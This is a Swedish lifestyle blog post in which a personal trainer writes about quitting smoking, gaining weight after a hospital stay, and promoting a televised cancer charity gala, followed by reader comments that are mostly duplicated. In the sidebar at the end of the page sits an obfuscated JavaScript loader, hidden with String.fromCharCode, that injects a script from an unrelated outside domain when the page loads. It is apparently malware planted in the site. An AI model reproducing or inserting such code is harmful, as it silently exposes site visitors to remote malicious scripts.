Fyra månader rökfri. 12 kilo upp! jaja. Bättre det! Nu ikväll, klockan 20:00 Tillsammans mot cancergalan! TV4. Missa inte!

IMG_7901Godmorgon!

Hoppas att din helg varit bra. Våran har varit lugn och skön. Inga måsten, lugn och ro.

Jag har precis varit ute på en morgon promenad. Absolut ingen PW. Jag är tillbaks på ruta ett med träningen och motionen. Jag gick ca 2 kilometer i lugnt tempo. Får börja väldigt försiktigt. Får acceptera att jag är nedsatt och nyopererad. Ett par veckor i lugnt tempo sedan kan jag öka på igen… Ett steg i taget. Sakta men säkert =) IMG_7929

Jag Sitter just nu och försöker att hitta en klänning inför ikväll. Tillsammans mot Cancergalan direktsänd på TV4 och vi ska vara på plats klockan  17:00 vid Annexet intill Globen. Egentligen så spelar ju kläderna inte sås tor roll. MEN. 

Jag hade planerat detta sedan länge, men har varit så osäker på om jag skulle bli frisk då jag för en vecka sedan låg inlärd på sjukhus. Klänningarna som designern skickade till mig hämtades aldrig ut då jag låg på sjukhus då. Ingen fara tänkte jag, och skulle testa några andra klänningar som jag hade hemma.

MEN dra mig baklänges! Om inte någon elaking varit hemma hos mig och krymt ALLA mina klänningar då har något gått snett. Jag provade över NIO klänningar. INGEN passade! 

PÅ RIKTIGT, jag har varit sjuk och inte kunnat äta ordentligt på flera veckor. Jag har dessutom bott i träningskläder, sjukhuskläder och mjukiskläder sista månaden, så detta såg jag INTE komma!

Jag rusade in i badrummet, slet fram vågen, dammade av den och klev upp! DRA MIG BAKLÄNGES 12 kilo! 12 KILO plus! Hmm, jag är långt ifrån viktfixerad. Jag väger mig sällan. Lite FÖR sällan tydligen. Men det som stör/skrämmer och irriterar mig är att jag gått upp det på väldigt kort tid. DE har lixom smugit sig på. DET är verkligen inte bra för kroppen. Varken för insidan eller utsidan. Det stör ämnesomsättningen. Det kan även rubba immunförsvaret  M.m.

Jag har varit rökfri i drygt  4 månader. DET är jag mer än stolt över. Jag har varit storrökare och rökt sedan jag var 13 år gammal. Slutade när vi planerade Lilleman, höll upp länge. Men föll tillbaka igen. Sen har jag hållt på sådär, fram och tillbaka. Slutat, börjat. Försökt HUR många gånger som helst. Men för några månader sedan bestämde jag mig. Jag lyckades jag kommer ALDRIG att falla tillbaka igen! ALDRIG! Men jag har uppenbarligen bytt ut rökningen mot något annat.  Jag kan ändå inte tycka tt jag ätit SÅ mycket mer. Hmm, måste göra en sjuanalys om just det. Men inte nu. Det har jag inte tid för. 

Sista veckorna har det varit både dropp och morfinpreparat. Plus att jag varit väldigt mycket liggande. Sedan 23 dec. Jag vet att det gör att man samlar på sig vätska. Men som PT och människa så måste jag nog ändå erkänna både för dig och mig själv att dom där 12 kilona är långt ifrån bara vätska . Mer om detta i ett senare inlägg!

Nu ska jag äta frukost med Lilleman, försöka lägga en ansiktsmak med en massa återfraktande.. Trolla bort min vita, nästintill genomskinliga sjukhus look med lite ”hemma vård” och smink! Sen får jag försöka åka iväg och köpa en klänning som jag kan ha. En klänning som går att stänga i ryggen! Efter att jag lämnat Lilleman på flyget. 

IMG_7902 IMG_7909

I samarbete med Cancerfonden så vill jag påminna dig att titta på Tillsammans mot cancergalan ikväll. Årets viktigaste gala. Ikväll klockan 20:00 på TV4.

Inte ett öga brukar vara torrt. MEN, Tillsammans gör vi skillnad!  Bli månadsgivare du också!

Det finns inte många saker som skrämmer mig. men denna j*vla sjukdom skrämmer mig extremt. Jag är mest rädd att det ska drabba någon i min närhet. Att man ska upptäcka den försent. I min familj har vi redan förlorat flera stycken  i just cancer. Två av mina absolut närmaste kämpar mot cancer just nu.

Jag,  jag vill vara med och se hur Ludvig växer upp, hur han får barn och kanske till och med barnbarn. Så just precis därför brinner jag extra mycket för detta. Tack vare denna gala, tack vara alla fantastiska människor som jobbar ideellt med detta och TACK vara alla underbara månadsgivare. Framförallt TACK vara alla medarbetare och vardagshjältar som jobbar med Cancerfonden så gör forskningen fantastiska fram steg!  Fortsätt så! Missa INTE galan ikväll <3 

IMG_7888

OLYMPUS DIGITAL CAMERA
Tror du att denna masken kan göra någon skillnad på denna trötta uppsyn?! Spelar egentligen ingen roll, varken hur jag ser ut eller hur mycket jag väger. Nu ska ett viktigt budskap spridas! VI hörs senare fina du <3 Kramar /My Martens 

68 Komentarer

 1. Vikten kommer att krympa så småningom. Köp en ny klänning idag och var extra glad för att du har varit så duktig att du slutat röka. Heja dig!! Jag ska se på cancergalan ikväll. Fuck cancer!

  • Ja, i det stora hela så spelar vikten ingen roll. Jag är hemma, börjar bli frisk och vi har ett viktigt budskap att sprida <3 MEN, att gå upp så mycket på så pass kort tid. DET är inte hälsosamt för kroppen.. så just det kommer jag att hålla kolla på….. =) Tack fina du! kram

 2. Samma här….legat i soffan efter axeloperation….men tugga det har gått så bra…
  Förlorade min älskade pappa i cancer. Från besked 16/6-08 så dog han 6/10-08.
  Ha en fin kväll

 3. Ja det är inte ovanligt att gå upp när man slutar röka! Jag har varit rökfri i 14 år nu! Jag är 38 år. Slutade röka när jag blev gravid. Gick oxå upp över 10 kg ?! Men det är ändå värt det som du säger! Kroppen ställer om sig, du kommer gå ner dom kilona igen. För mig vände det efter några månader o jag gick ner för mkt istället. Utan att banta! Nu väger jag för lite istället. Det är inte heller roligt. Det syns inte på dig att du gått upp 12 kilo! Du är lika fin som alltid ❤️! Det säger jag inte bara för att vara snäll. Du ÄR fin ❤️!

  • Tack Linda <3 Vad gullig du är! Härligt med 14 år som rökfri! GRYMT jobbat! <3 Ja, hellre 12 kilo plus än rökare. Får ta tag i dom sakta men säkert… Stor kram

 4. Vikten kommer att krympa så småningom. Köp en ny klänning idag och var extra glad för att du har varit så duktig att du slutat röka. Heja dig!! Jag ska se på cancergalan ikväll. Fuck cancer!

  • Ja, i det stora hela så spelar vikten ingen roll. Jag är hemma, börjar bli frisk och vi har ett viktigt budskap att sprida <3 MEN, att gå upp så mycket på så pass kort tid. DET är inte hälsosamt för kroppen.. så just det kommer jag att hålla kolla på….. =) Tack fina du! kram

 5. Samma här….legat i soffan efter axeloperation….men tugga det har gått så bra…
  Förlorade min älskade pappa i cancer. Från besked 16/6-08 så dog han 6/10-08.
  Ha en fin kväll

 6. Ja det är inte ovanligt att gå upp när man slutar röka! Jag har varit rökfri i 14 år nu! Jag är 38 år. Slutade röka när jag blev gravid. Gick oxå upp över 10 kg 😱! Men det är ändå värt det som du säger! Kroppen ställer om sig, du kommer gå ner dom kilona igen. För mig vände det efter några månader o jag gick ner för mkt istället. Utan att banta! Nu väger jag för lite istället. Det är inte heller roligt. Det syns inte på dig att du gått upp 12 kilo! Du är lika fin som alltid ❤️! Det säger jag inte bara för att vara snäll. Du ÄR fin ❤️!

  • Tack Linda <3 Vad gullig du är! Härligt med 14 år som rökfri! GRYMT jobbat! <3 Ja, hellre 12 kilo plus än rökare. Får ta tag i dom sakta men säkert… Stor kram

 7. Min dotter har bröstcancer, har tre små barn och nu kämpar hon för att bli frisk. FUCK CANCER !!!!
  Bra att du är rökfri, håller med de andra, här ovan, om vikten, den kommer att gå ner till normalt sen. Good luck !
  Ska se galan ikväll, och gråta blir det nog

 8. OMG vad duktig du är som hållit upp så länge!! GRATTIS men beklagar de 12 kilona som du inte direkt ville ha. ? Men nu när du har pt utbildning och allt så har du kanske lättare att ändra de 12 till muskler och härligheter. ? Nu har du rätta nycklarna för att göra lite vad du vill med din kropp, sen gäller det nog bara att ha tid också. :/
  Du ser i alla fall hur fin ut som helst så man ser inga 12 kilon inte, kanske bara fel på vågen! ?
  Fortsätt stark och säg nej till cancerpinnarna, det är det bästa jag kunde ha gjort i mitt liv nästan, att sluta röka (suget finns ALLTID där även efter 10 år) men är ändå så nöjd med beslutet. Aldrig mer rökare.
  Kram och ha en fin dag.

 9. Min dotter har bröstcancer, har tre små barn och nu kämpar hon för att bli frisk. FUCK CANCER !!!!
  Bra att du är rökfri, håller med de andra, här ovan, om vikten, den kommer att gå ner till normalt sen. Good luck !
  Ska se galan ikväll, och gråta blir det nog

 10. OMG vad duktig du är som hållit upp så länge!! GRATTIS men beklagar de 12 kilona som du inte direkt ville ha. 😀 Men nu när du har pt utbildning och allt så har du kanske lättare att ändra de 12 till muskler och härligheter. 😀 Nu har du rätta nycklarna för att göra lite vad du vill med din kropp, sen gäller det nog bara att ha tid också. :/
  Du ser i alla fall hur fin ut som helst så man ser inga 12 kilon inte, kanske bara fel på vågen! 😀
  Fortsätt stark och säg nej till cancerpinnarna, det är det bästa jag kunde ha gjort i mitt liv nästan, att sluta röka (suget finns ALLTID där även efter 10 år) men är ändå så nöjd med beslutet. Aldrig mer rökare.

  Kram och ha en fin dag.

 11. Heja dig! Superbra jobbat! Strunta i kilona, de syns inte och kommer att minska. Dessutom kan du ha samlat på dig en hel del vatten när du inte rört dig så mycket. Jag skyller alltid på vattensamling om jag lägger på mig några kilo, perfekt att skylla på, ha ha! ? Ha det bra! Kram!

 12. Heja dig! Superbra jobbat! Strunta i kilona, de syns inte och kommer att minska. Dessutom kan du ha samlat på dig en hel del vatten när du inte rört dig så mycket. Jag skyller alltid på vattensamling om jag lägger på mig några kilo, perfekt att skylla på, ha ha! 🙂 Ha det bra! Kram!

 13. Åååh så härligt att du är frisk igen och härligt att gå på gala, även att det är ett tungt ämne, vilken tur att du blev frisk i tid till tv-galan! Ska se på galan förstås, kanske syns du i bild även i år ? Men stackars stackars dig som förlorat flera i familjen i cancer, usch så hemskt, och att du har två som står dig nära som nu kämpar, är det två i familjen eller är det nära vänner? Hoppas du känner att du hinner träffa dem och finnas för dem, och att allt går bra för dem. Har själv förlorat min pappa i cancer och flera i släkten har det, Fuck cancer! Och du, det syns inga extra kilon, definitivt inga 12 (!?) kilon! Nejdå ser lagom ut, kanske fel på vågen ? Lycka till!

 14. Måste bara få skicka lite extra ros till dig som skriver om din viktuppgång, inte många som skulle göra det. Sen så fixar du att gå ned dessa kilo, med tanke på din envishet o styrka som vi får läsa om i din härliga blogg. Hoppas du får en kanonkväll My! Madde

 15. Åååh så härligt att du är frisk igen och härligt att gå på gala, även att det är ett tungt ämne, vilken tur att du blev frisk i tid till tv-galan! Ska se på galan förstås, kanske syns du i bild även i år 😉 Men stackars stackars dig som förlorat flera i familjen i cancer, usch så hemskt, och att du har två som står dig nära som nu kämpar, är det två i familjen eller är det nära vänner? Hoppas du känner att du hinner träffa dem och finnas för dem, och att allt går bra för dem. Har själv förlorat min pappa i cancer och flera i släkten har det, Fuck cancer! Och du, det syns inga extra kilon, definitivt inga 12 (!?) kilon! Nejdå ser lagom ut, kanske fel på vågen 😉 Lycka till!

 16. Måste bara få skicka lite extra ros till dig som skriver om din viktuppgång, inte många som skulle göra det. Sen så fixar du att gå ned dessa kilo, med tanke på din envishet o styrka som vi får läsa om i din härliga blogg. Hoppas du får en kanonkväll My! Madde

 17. Om jag har fattat det rätt så verkar det som att man går upp när man slutar röka, även om man inte äter mer. Ska ha med ämnesomsättningen att göra
  Rätta mig om jag har fel, ni som vet mer.
  Men du är jätteduktig som slutat röka, det är det viktiga.

 18. Om jag har fattat det rätt så verkar det som att man går upp när man slutar röka, även om man inte äter mer. Ska ha med ämnesomsättningen att göra
  Rätta mig om jag har fel, ni som vet mer.
  Men du är jätteduktig som slutat röka, det är det viktiga.

 19. Hej fina My! Såg på cancer galan i går och grät floder!! Så starka, fina människor som orkar kämpa på med denna vidriga sjukdom!!! Har en vännina dom fick den värsta sortens äggstock cancer bara 37 år i nov, hon har två fina flickor 9 och 14 år. Hon fick troligtvis sin sista 3:e beh/ strålning i dag och opereras i feb, de kommer ta bort allt livmoder och äggstockar. Min väninna har mått bra under dessa beh/ strålningar som tur är? och hon är så fantastisk stark, beundrar henne❤️ Så jag blev självklart månadsgivare till Cancerfonden! Jag är med Fuck cancer? Ps! Hoppas du hittade en fin klänning till dig?!? Skönt att du kommit tillbaka igen efter op, ta det lugn med träning och kör inte på för hårt!! Var rädd om dig My? Kram Ewa??

 20. Hej fina My! Såg på cancer galan i går och grät floder!! Så starka, fina människor som orkar kämpa på med denna vidriga sjukdom!!! Har en vännina dom fick den värsta sortens äggstock cancer bara 37 år i nov, hon har två fina flickor 9 och 14 år. Hon fick troligtvis sin sista 3:e beh/ strålning i dag och opereras i feb, de kommer ta bort allt livmoder och äggstockar. Min väninna har mått bra under dessa beh/ strålningar som tur är🙏 och hon är så fantastisk stark, beundrar henne❤️ Så jag blev självklart månadsgivare till Cancerfonden! Jag är med Fuck cancer👊 Ps! Hoppas du hittade en fin klänning till dig?!😊 Skönt att du kommit tillbaka igen efter op, ta det lugn med träning och kör inte på för hårt!! Var rädd om dig My😊 Kram Ewa💕💕

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/